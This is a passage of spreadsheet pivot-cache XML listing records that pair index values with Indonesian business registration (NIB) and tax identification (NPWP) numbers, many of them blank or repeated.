    <s v="02.212.000.0-629.000"/>
  </r>
  <r>
    <x v="4286"/>
    <s v="nib"/>
    <n v="9120103980464"/>
  </r>
  <r>
    <x v="4282"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="827"/>
    <s v="nib"/>
    <n v="9120218022623"/>
  </r>
  <r>
    <x v="544"/>
    <s v="nib"/>
    <n v="9120001450741"/>
  </r>
  <r>
    <x v="4273"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4287"/>
    <s v="nib"/>
    <n v="9120018101595"/>
  </r>
  <r>
    <x v="454"/>
    <s v="nib"/>
    <n v="8120114202661"/>
  </r>
  <r>
    <x v="4288"/>
    <s v="nib"/>
    <n v="8120012021113"/>
  </r>
  <r>
    <x v="4289"/>
    <s v="nib"/>
    <n v="220002780389"/>
  </r>
  <r>
    <x v="4290"/>
    <s v="nib"/>
    <n v="9120108880738"/>
  </r>
  <r>
    <x v="1334"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="636"/>
    <s v="nib"/>
    <n v="9120101751083"/>
  </r>
  <r>
    <x v="4280"/>
    <s v="npwp"/>
    <n v="710039173721000"/>
  </r>
  <r>
    <x v="4291"/>
    <s v="nib"/>
    <n v="9120213011276"/>
  </r>
  <r>
    <x v="4292"/>
    <s v="nib"/>
    <n v="220109451473"/>
  </r>
  <r>
    <x v="4293"/>
    <s v="nib"/>
    <n v="220105651583"/>
  </r>
  <r>
    <x v="4294"/>
    <s v="nib"/>
    <n v="12255145616"/>
  </r>
  <r>
    <x v="522"/>
    <s v="nib"/>
    <s v="NIB : 0294001931401"/>
  </r>
  <r>
    <x v="889"/>
    <s v="nib"/>
    <n v="8120000851913"/>
  </r>
  <r>
    <x v="4295"/>
    <s v="nib"/>
    <n v="9120307803304"/>
  </r>
  <r>
    <x v="4296"/>
    <s v="nib"/>
    <n v="9120106250782"/>
  </r>
  <r>
    <x v="4297"/>
    <s v="nib"/>
    <n v="3212161304580000"/>
  </r>
  <r>
    <x v="4288"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4237"/>
    <s v="npwp"/>
    <s v="01.891.866.4-041.000"/>
  </r>
  <r>
    <x v="4298"/>
    <s v="nib"/>
    <n v="9120200141153"/>
  </r>
  <r>
    <x v="4299"/>
    <s v="nib"/>
    <n v="8120206860214"/>
  </r>
  <r>
    <x v="4300"/>
    <s v="nib"/>
    <n v="220108471171"/>
  </r>
  <r>
    <x v="654"/>
    <s v="nib"/>
    <n v="9120602172119"/>
  </r>
  <r>
    <x v="4301"/>
    <s v="nib"/>
    <n v="220208112406"/>
  </r>
  <r>
    <x v="4291"/>
    <s v="npwp"/>
    <n v="30475982805001"/>
  </r>
  <r>
    <x v="4278"/>
    <s v="npwp"/>
    <s v="76.674.712.5-448.000"/>
  </r>
  <r>
    <x v="4302"/>
    <s v="nib"/>
    <n v="220002162627"/>
  </r>
  <r>
    <x v="4283"/>
    <s v="npwp"/>
    <s v="01.393.081.3-044.000"/>
  </r>
  <r>
    <x v="4303"/>
    <s v="nib"/>
    <n v="220103132918"/>
  </r>
  <r>
    <x v="4299"/>
    <s v="npwp"/>
    <s v="01.721.208.5-041.000"/>
  </r>
  <r>
    <x v="4304"/>
    <s v="nib"/>
    <n v="8120304782556"/>
  </r>
  <r>
    <x v="843"/>
    <s v="nib"/>
    <n v="8120304782556"/>
  </r>
  <r>
    <x v="4302"/>
    <s v="npwp"/>
    <n v="81825986215000"/>
  </r>
  <r>
    <x v="4305"/>
    <s v="nib"/>
    <n v="220302631084"/>
  </r>
  <r>
    <x v="4306"/>
    <s v="nib"/>
    <n v="220102362961"/>
  </r>
  <r>
    <x v="4307"/>
    <s v="nib"/>
    <n v="9120310120148"/>
  </r>
  <r>
    <x v="4202"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="817"/>
    <s v="nib"/>
    <n v="9120103412123"/>
  </r>
  <r>
    <x v="4286"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4308"/>
    <s v="nib"/>
    <n v="220004430653"/>
  </r>
  <r>
    <x v="888"/>
    <s v="nib"/>
    <n v="8120000803403"/>
  </r>
  <r>
    <x v="4296"/>
    <s v="npwp"/>
    <s v="85.652.772.6-617.000"/>
  </r>
  <r>
    <x v="4309"/>
    <s v="nib"/>
    <n v="9120310131255"/>
  </r>
  <r>
    <x v="596"/>
    <s v="nib"/>
    <n v="9120003132942"/>
  </r>
  <r>
    <x v="4310"/>
    <s v="nib"/>
    <n v="220202401647"/>
  </r>
  <r>
    <x v="4307"/>
    <s v="npwp"/>
    <n v="933378267216000"/>
  </r>
  <r>
    <x v="671"/>
    <s v="nib"/>
    <n v="8120307870726"/>
  </r>
  <r>
    <x v="4305"/>
    <s v="npwp"/>
    <s v="95.014.394.1-922.000"/>
  </r>
  <r>
    <x v="3842"/>
    <s v="npwp"/>
    <s v="82.897.815.5-608.000"/>
  </r>
  <r>
    <x v="4301"/>
    <s v="npwp"/>
    <s v="68.214.591.7-542.000"/>
  </r>
  <r>
    <x v="387"/>
    <s v="nib"/>
    <n v="8120211220938"/>
  </r>
  <r>
    <x v="808"/>
    <s v="nib"/>
    <n v="8120004791485"/>
  </r>
  <r>
    <x v="4311"/>
    <s v="nib"/>
    <n v="8120107752273"/>
  </r>
  <r>
    <x v="19"/>
    <s v="nib"/>
    <n v="9120500731997"/>
  </r>
  <r>
    <x v="4312"/>
    <s v="nib"/>
    <n v="9120200800118"/>
  </r>
  <r>
    <x v="4313"/>
    <s v="nib"/>
    <n v="9120014221864"/>
  </r>
  <r>
    <x v="4314"/>
    <s v="nib"/>
    <n v="220002242595"/>
  </r>
  <r>
    <x v="4315"/>
    <s v="nib"/>
    <n v="9120115131019"/>
  </r>
  <r>
    <x v="4217"/>
    <s v="npwp"/>
    <s v="01.327.446.9.009.000"/>
  </r>
  <r>
    <x v="4249"/>
    <s v="npwp"/>
    <s v="01.718.122.3-415.000"/>
  </r>
  <r>
    <x v="4316"/>
    <s v="nib"/>
    <n v="9120205361344"/>
  </r>
  <r>
    <x v="974"/>
    <s v="nib"/>
    <n v="8120005960155"/>
  </r>
  <r>
    <x v="1634"/>
    <s v="nib"/>
    <n v="8120002900537"/>
  </r>
  <r>
    <x v="4308"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="2001"/>
    <s v="npwp"/>
    <s v="90.051.402.7-507.000"/>
  </r>
  <r>
    <x v="4317"/>
    <s v="nib"/>
    <n v="220004430653"/>
  </r>
  <r>
    <x v="4318"/>
    <s v="nib"/>
    <n v="8120200702561"/>
  </r>
  <r>
    <x v="4319"/>
    <s v="nib"/>
    <n v="220200200043"/>
  </r>
  <r>
    <x v="194"/>
    <s v="nib"/>
    <n v="9120302361682"/>
  </r>
  <r>
    <x v="4320"/>
    <s v="nib"/>
    <n v="8120101891256"/>
  </r>
  <r>
    <x v="4321"/>
    <s v="nib"/>
    <n v="8120104811249"/>
  </r>
  <r>
    <x v="4322"/>
    <s v="nib"/>
    <n v="8120212202307"/>
  </r>
  <r>
    <x v="4323"/>
    <s v="nib"/>
    <n v="220001542957"/>
  </r>
  <r>
    <x v="4311"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4324"/>
    <s v="nib"/>
    <s v="NIB"/>
  </r>
  <r>
    <x v="173"/>
    <s v="nib"/>
    <n v="8120001771996"/>
  </r>
  <r>
    <x v="4325"/>
    <s v="nib"/>
    <n v="9120001372182"/>
  </r>
  <r>
    <x v="4326"/>
    <s v="nib"/>
    <n v="8120119053301"/>
  </r>
  <r>
    <x v="4327"/>
    <s v="nib"/>
    <n v="8120212202307"/>
  </r>
  <r>
    <x v="4205"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4222"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4328"/>
    <s v="nib"/>
    <n v="9120003511436"/>
  </r>
  <r>
    <x v="1061"/>
    <s v="nib"/>
    <n v="8120110232884"/>
  </r>
  <r>
    <x v="4329"/>
    <s v="nib"/>
    <n v="8120104922208"/>
  </r>
  <r>
    <x v="4324"/>
    <s v="npwp"/>
    <s v="NPWP"/>
  </r>
  <r>
    <x v="4330"/>
    <s v="nib"/>
    <n v="9120018101595"/>
  </r>
  <r>
    <x v="4331"/>
    <s v="nib"/>
    <n v="9120002201528"/>
  </r>
  <r>
    <x v="4309"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4332"/>
    <s v="nib"/>
    <n v="8120213051393"/>
  </r>
  <r>
    <x v="4332"/>
    <s v="npwp"/>
    <n v="13199575941000"/>
  </r>
  <r>
    <x v="4319"/>
    <s v="npwp"/>
    <s v="71.964.479.1-101.000"/>
  </r>
  <r>
    <x v="4295"/>
    <s v="npwp"/>
    <s v="01.317.659.9-026.000"/>
  </r>
  <r>
    <x v="4333"/>
    <s v="nib"/>
    <n v="220103581559"/>
  </r>
  <r>
    <x v="4334"/>
    <s v="nib"/>
    <n v="9120104191749"/>
  </r>
  <r>
    <x v="4331"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4335"/>
    <s v="nib"/>
    <n v="220003790696"/>
  </r>
  <r>
    <x v="4336"/>
    <s v="nib"/>
    <n v="8120000791661"/>
  </r>
  <r>
    <x v="4337"/>
    <s v="nib"/>
    <n v="8120111052863"/>
  </r>
  <r>
    <x v="2025"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4338"/>
    <s v="nib"/>
    <n v="8120015251709"/>
  </r>
  <r>
    <x v="1106"/>
    <s v="nib"/>
    <n v="8120015251709"/>
  </r>
  <r>
    <x v="4339"/>
    <s v="nib"/>
    <n v="9120005682802"/>
  </r>
  <r>
    <x v="4340"/>
    <s v="nib"/>
    <n v="220103581559"/>
  </r>
  <r>
    <x v="4341"/>
    <s v="nib"/>
    <n v="220101740925"/>
  </r>
  <r>
    <x v="4342"/>
    <s v="nib"/>
    <n v="8120110232884"/>
  </r>
  <r>
    <x v="4328"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4284"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4343"/>
    <s v="nib"/>
    <n v="8120215100063"/>
  </r>
  <r>
    <x v="4343"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4334"/>
    <s v="npwp"/>
    <n v="764513149951000"/>
  </r>
  <r>
    <x v="4344"/>
    <s v="nib"/>
    <n v="220002830587"/>
  </r>
  <r>
    <x v="4345"/>
    <s v="nib"/>
    <n v="220301890463"/>
  </r>
  <r>
    <x v="4346"/>
    <s v="nib"/>
    <n v="220108850846"/>
  </r>
  <r>
    <x v="4347"/>
    <s v="nib"/>
    <n v="9120210040477"/>
  </r>
  <r>
    <x v="4348"/>
    <s v="nib"/>
    <n v="9120007101929"/>
  </r>
  <r>
    <x v="4345"/>
    <s v="npwp"/>
    <n v="955663067951000"/>
  </r>
  <r>
    <x v="4323"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4342"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4349"/>
    <s v="nib"/>
    <n v="8120110232884"/>
  </r>
  <r>
    <x v="4310"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4336"/>
    <s v="npwp"/>
    <s v="NPWP PT. Singgasana Unagi Indonesia"/>
  </r>
  <r>
    <x v="4350"/>
    <s v="nib"/>
    <n v="220305801117"/>
  </r>
  <r>
    <x v="4351"/>
    <s v="nib"/>
    <n v="8120200872086"/>
  </r>
  <r>
    <x v="4344"/>
    <s v="npwp"/>
    <n v="955219308951000"/>
  </r>
  <r>
    <x v="4352"/>
    <s v="nib"/>
    <n v="9120017240543"/>
  </r>
  <r>
    <x v="4250"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4337"/>
    <s v="npwp"/>
    <n v="849750674305000"/>
  </r>
  <r>
    <x v="4224"/>
    <s v="npwp"/>
    <s v="36.562.823.9-516.000"/>
  </r>
  <r>
    <x v="925"/>
    <s v="nib"/>
    <n v="220109810077"/>
  </r>
  <r>
    <x v="926"/>
    <s v="nib"/>
    <n v="9120306890989"/>
  </r>
  <r>
    <x v="4322"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="663"/>
    <s v="nib"/>
    <s v="NIB"/>
  </r>
  <r>
    <x v="972"/>
    <s v="nib"/>
    <n v="8120200702561"/>
  </r>
  <r>
    <x v="4353"/>
    <s v="nib"/>
    <n v="220104840345"/>
  </r>
  <r>
    <x v="4354"/>
    <s v="nib"/>
    <n v="8120200872086"/>
  </r>
  <r>
    <x v="4340"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4355"/>
    <s v="nib"/>
    <n v="9120018101595"/>
  </r>
  <r>
    <x v="4356"/>
    <s v="nib"/>
    <n v="220204672632"/>
  </r>
  <r>
    <x v="4357"/>
    <s v="nib"/>
    <n v="220003491064"/>
  </r>
  <r>
    <x v="4329"/>
    <s v="npwp"/>
    <s v="02.550.439.0-943.000"/>
  </r>
  <r>
    <x v="330"/>
    <s v="nib"/>
    <n v="8120002821971"/>
  </r>
  <r>
    <x v="4298"/>
    <s v="npwp"/>
    <s v="01.000.065.1-942.002"/>
  </r>
  <r>
    <x v="4358"/>
    <s v="nib"/>
    <n v="8120000842689"/>
  </r>
  <r>
    <x v="4359"/>
    <s v="nib"/>
    <n v="9120308771201"/>
  </r>
  <r>
    <x v="4360"/>
    <s v="nib"/>
    <n v="9120017021652"/>
  </r>
  <r>
    <x v="4361"/>
    <s v="nib"/>
    <n v="9120308771201"/>
  </r>
  <r>
    <x v="812"/>
    <s v="nib"/>
    <n v="9120206132793"/>
  </r>
  <r>
    <x v="4362"/>
    <s v="nib"/>
    <n v="220107802219"/>
  </r>
  <r>
    <x v="4363"/>
    <s v="nib"/>
    <n v="220107802219"/>
  </r>
  <r>
    <x v="4364"/>
    <s v="nib"/>
    <n v="9120204960745"/>
  </r>
  <r>
    <x v="4365"/>
    <s v="nib"/>
    <n v="8120007950856"/>
  </r>
  <r>
    <x v="4366"/>
    <s v="nib"/>
    <n v="8120117012268"/>
  </r>
  <r>
    <x v="459"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4367"/>
    <s v="nib"/>
    <n v="220002790515"/>
  </r>
  <r>
    <x v="4367"/>
    <s v="npwp"/>
    <s v="06.319.742.0-214.000"/>
  </r>
  <r>
    <x v="4368"/>
    <s v="nib"/>
    <n v="8120108912202"/>
  </r>
  <r>
    <x v="4369"/>
    <s v="nib"/>
    <n v="9120208933005"/>
  </r>
  <r>
    <x v="4370"/>
    <s v="nib"/>
    <n v="9120106181842"/>
  </r>
  <r>
    <x v="4371"/>
    <s v="nib"/>
    <n v="299011092113"/>
  </r>
  <r>
    <x v="4368"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4371"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4372"/>
    <s v="nib"/>
    <n v="9120404261344"/>
  </r>
  <r>
    <x v="4356"/>
    <s v="npwp"/>
    <s v="55.139.853.0-202.000"/>
  </r>
  <r>
    <x v="2651"/>
    <s v="npwp"/>
    <s v="02.079.603.3-903.000"/>
  </r>
  <r>
    <x v="816"/>
    <s v="nib"/>
    <n v="8120117012268"/>
  </r>
  <r>
    <x v="4373"/>
    <s v="nib"/>
    <n v="9120304272382"/>
  </r>
  <r>
    <x v="4374"/>
    <s v="nib"/>
    <n v="9120008702965"/>
  </r>
  <r>
    <x v="4375"/>
    <s v="nib"/>
    <n v="220107732517"/>
  </r>
  <r>
    <x v="4376"/>
    <s v="nib"/>
    <n v="220009702739"/>
  </r>
  <r>
    <x v="4358"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4377"/>
    <s v="nib"/>
    <n v="9120017021088"/>
  </r>
  <r>
    <x v="4378"/>
    <s v="nib"/>
    <n v="8120201980043"/>
  </r>
  <r>
    <x v="899"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4379"/>
    <s v="nib"/>
    <n v="220006472189"/>
  </r>
  <r>
    <x v="4380"/>
    <s v="nib"/>
    <n v="220100791739"/>
  </r>
  <r>
    <x v="4380"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4346"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4347"/>
    <s v="npwp"/>
    <n v="33349713215000"/>
  </r>
  <r>
    <x v="291"/>
    <s v="nib"/>
    <n v="8120003890563"/>
  </r>
  <r>
    <x v="4381"/>
    <s v="nib"/>
    <n v="9120302490768"/>
  </r>
  <r>
    <x v="4382"/>
    <s v="nib"/>
    <n v="9120209351033"/>
  </r>
  <r>
    <x v="4383"/>
    <s v="nib"/>
    <n v="9120304931505"/>
  </r>
  <r>
    <x v="4384"/>
    <s v="nib"/>
    <n v="220106601599"/>
  </r>
  <r>
    <x v="4385"/>
    <s v="nib"/>
    <n v="220203890543"/>
  </r>
  <r>
    <x v="674"/>
    <s v="nib"/>
    <n v="9120203381344"/>
  </r>
  <r>
    <x v="2129"/>
    <s v="npwp"/>
    <s v="21.038.082.0-503.000"/>
  </r>
  <r>
    <x v="4386"/>
    <s v="nib"/>
    <n v="8120311042039"/>
  </r>
  <r>
    <x v="4387"/>
    <s v="nib"/>
    <n v="220009512378"/>
  </r>
  <r>
    <x v="4385"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4388"/>
    <s v="nib"/>
    <n v="9120100801594"/>
  </r>
  <r>
    <x v="4389"/>
    <s v="nib"/>
    <n v="220002692044"/>
  </r>
  <r>
    <x v="4390"/>
    <s v="nib"/>
    <n v="9120404750529"/>
  </r>
  <r>
    <x v="28"/>
    <s v="nib"/>
    <n v="912031121557"/>
  </r>
  <r>
    <x v="4391"/>
    <s v="nib"/>
    <n v="220305132507"/>
  </r>
  <r>
    <x v="824"/>
    <s v="nib"/>
    <n v="9120011060059"/>
  </r>
  <r>
    <x v="4392"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4393"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4394"/>
    <s v="nib"/>
    <n v="220406822093"/>
  </r>
  <r>
    <x v="4395"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4396"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4397"/>
    <s v="nib"/>
    <n v="220201182724"/>
  </r>
  <r>
    <x v="4398"/>
    <s v="nib"/>
    <n v="9120204731886"/>
  </r>
  <r>
    <x v="4389"/>
    <s v="npwp"/>
    <s v="14.742.543.3-701-000"/>
  </r>
  <r>
    <x v="4300"/>
    <s v="npwp"/>
    <s v="94.684.286.1-008.000"/>
  </r>
  <r>
    <x v="320"/>
    <s v="nib"/>
    <n v="8120210002834"/>
  </r>
  <r>
    <x v="4399"/>
    <s v="nib"/>
    <n v="8120007872185"/>
  </r>
  <r>
    <x v="4391"/>
    <s v="npwp"/>
    <s v="81.711.293.1-805.000"/>
  </r>
  <r>
    <x v="963"/>
    <s v="nib"/>
    <n v="8120103950469"/>
  </r>
  <r>
    <x v="4400"/>
    <s v="nib"/>
    <n v="8120011181279"/>
  </r>
  <r>
    <x v="4377"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4401"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4384"/>
    <s v="npwp"/>
    <n v="951173327801000"/>
  </r>
  <r>
    <x v="4402"/>
    <s v="nib"/>
    <n v="8120006980263"/>
  </r>
  <r>
    <x v="4403"/>
    <s v="nib"/>
    <n v="8120006980263"/>
  </r>
  <r>
    <x v="4404"/>
    <s v="nib"/>
    <n v="220303391821"/>
  </r>
  <r>
    <x v="4405"/>
    <s v="nib"/>
    <n v="220205671485"/>
  </r>
  <r>
    <x v="4406"/>
    <s v="nib"/>
    <n v="8120312051279"/>
  </r>
  <r>
    <x v="4407"/>
    <s v="nib"/>
    <n v="8120312051279"/>
  </r>
  <r>
    <x v="4408"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4409"/>
    <s v="nib"/>
    <n v="220001801435"/>
  </r>
  <r>
    <x v="4404"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4410"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4411"/>
    <s v="nib"/>
    <n v="9120304272382"/>
  </r>
  <r>
    <x v="525"/>
    <s v="nib"/>
    <n v="8120103882431"/>
  </r>
  <r>
    <x v="4412"/>
    <s v="nib"/>
    <s v="06529-02/PK/1.824.271"/>
  </r>
  <r>
    <x v="4400"/>
    <s v="npwp"/>
    <s v="86.470.202.2-807.000"/>
  </r>
  <r>
    <x v="4357"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4410"/>
    <s v="npwp"/>
    <s v="95.769.679.2-113.000"/>
  </r>
  <r>
    <x v="4413"/>
    <s v="nib"/>
    <n v="225000991916"/>
  </r>
  <r>
    <x v="865"/>
    <s v="nib"/>
    <n v="220003611313"/>
  </r>
  <r>
    <x v="481"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4414"/>
    <s v="nib"/>
    <n v="220001801435"/>
  </r>
  <r>
    <x v="4415"/>
    <s v="nib"/>
    <n v="9120304272382"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="1048"/>
    <s v="nib"/>
    <n v="8120105702565"/>
  </r>
  <r>
    <x v="855"/>
    <s v="nib"/>
    <n v="9120200141153"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="220703970413"/>
  </r>
  <r>
    <x v="4417"/>
    <s v="nib"/>
    <n v="9120205352493"/>
  </r>
  <r>
    <x v="4418"/>
    <s v="nib"/>
    <n v="9120304272382"/>
  </r>
  <r>
    <x v="4419"/>
    <s v="nib"/>
    <n v="9120304272382"/>
  </r>
  <r>
    <x v="4418"/>
    <s v="npwp"/>
    <s v="01.871.297.6-507.001"/>
  </r>
  <r>
    <x v="4420"/>
    <s v="nib"/>
    <n v="9120017091292"/>
  </r>
  <r>
    <x v="4421"/>
    <s v="nib"/>
    <n v="8120107991289"/>
  </r>
  <r>
    <x v="4422"/>
    <s v="nib"/>
    <n v="8120212270961"/>
  </r>
  <r>
    <x v="4423"/>
    <s v="nib"/>
    <n v="8120001802818"/>
  </r>
  <r>
    <x v="4419"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="701"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4387"/>
    <s v="npwp"/>
    <n v="948053079041000"/>
  </r>
  <r>
    <x v="892"/>
    <s v="nib"/>
    <n v="8120211193207"/>
  </r>
  <r>
    <x v="4421"/>
    <s v="npwp"/>
    <s v="85.830.919.8-811.000"/>
  </r>
  <r>
    <x v="4424"/>
    <s v="nib"/>
    <n v="9120214142453"/>
  </r>
  <r>
    <x v="4425"/>
    <s v="nib"/>
    <n v="220006490876"/>
  </r>
  <r>
    <x v="870"/>
    <s v="nib"/>
    <n v="9120001222354"/>
  </r>
  <r>
    <x v="4215"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4426"/>
    <s v="nib"/>
    <n v="220200691177"/>
  </r>
  <r>
    <x v="4425"/>
    <s v="npwp"/>
    <s v="83.040.067.7-724.000"/>
  </r>
  <r>
    <x v="707"/>
    <s v="nib"/>
    <n v="8120203840613"/>
  </r>
  <r>
    <x v="4427"/>
    <s v="nib"/>
    <n v="8120001721627"/>
  </r>
  <r>
    <x v="1021"/>
    <s v="nib"/>
    <n v="8120006930063"/>
  </r>
  <r>
    <x v="4428"/>
    <s v="nib"/>
    <n v="220109241806"/>
  </r>
  <r>
    <x v="4429"/>
    <s v="nib"/>
    <n v="9120504920259"/>
  </r>
  <r>
    <x v="4430"/>
    <s v="nib"/>
    <n v="9120006971681"/>
  </r>
  <r>
    <x v="4428"/>
    <s v="npwp"/>
    <n v="942613431022000"/>
  </r>
  <r>
    <x v="4382"/>
    <s v="npwp"/>
    <s v="02.743.361.4-922.000"/>
  </r>
  <r>
    <x v="4431"/>
    <s v="nib"/>
    <n v="220205291731"/>
  </r>
  <r>
    <x v="4432"/>
    <s v="nib"/>
    <n v="220205291731"/>
  </r>
  <r>
    <x v="4433"/>
    <s v="nib"/>
    <n v="9120214142453"/>
  </r>
  <r>
    <x v="4427"/>
    <s v="npwp"/>
    <n v="13435938901001"/>
  </r>
  <r>
    <x v="4395"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4434"/>
    <s v="nib"/>
    <n v="8120117050983"/>
  </r>
  <r>
    <x v="4435"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4436"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4437"/>
    <s v="nib"/>
    <s v="8120014-151382"/>
  </r>
  <r>
    <x v="4438"/>
    <s v="nib"/>
    <n v="220302350791"/>
  </r>
  <r>
    <x v="937"/>
    <s v="nib"/>
    <n v="8120000910139"/>
  </r>
  <r>
    <x v="1007"/>
    <s v="nib"/>
    <n v="8120009802176"/>
  </r>
  <r>
    <x v="4439"/>
    <s v="nib"/>
    <n v="9120508753203"/>
  </r>
  <r>
    <x v="4440"/>
    <s v="nib"/>
    <n v="223000911882"/>
  </r>
  <r>
    <x v="4441"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4441"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4442"/>
    <s v="nib"/>
    <n v="220205291731"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4443"/>
    <s v="nib"/>
    <n v="8120014151382"/>
  </r>
  <r>
    <x v="4444"/>
    <s v="nib"/>
    <n v="8120001752609"/>
  </r>
  <r>
    <x v="4444"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4445"/>
    <s v="nib"/>
    <n v="8120110232884"/>
  </r>
  <r>
    <x v="4326"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4446"/>
    <s v="nib"/>
    <n v="9120107651597"/>
  </r>
  <r>
    <x v="4434"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4447"/>
    <s v="nib"/>
    <n v="9120214142453"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4381"/>
    <s v="npwp"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4448"/>
    <s v="nib"/>
    <n v="220005730962"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <m/>
  </r>
  <r>
    <x v="4449"/>
    <s v="nib"/>
    <n v="220306970831"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
    <n v="8120005782554"/>
  </r>
  <r>
    <x v="4450"/>
    <s v="nib"/>
    <n v="287000952315"/>
  </r>
  <r>
    <x v="4416"/>
    <s v="nib"/>
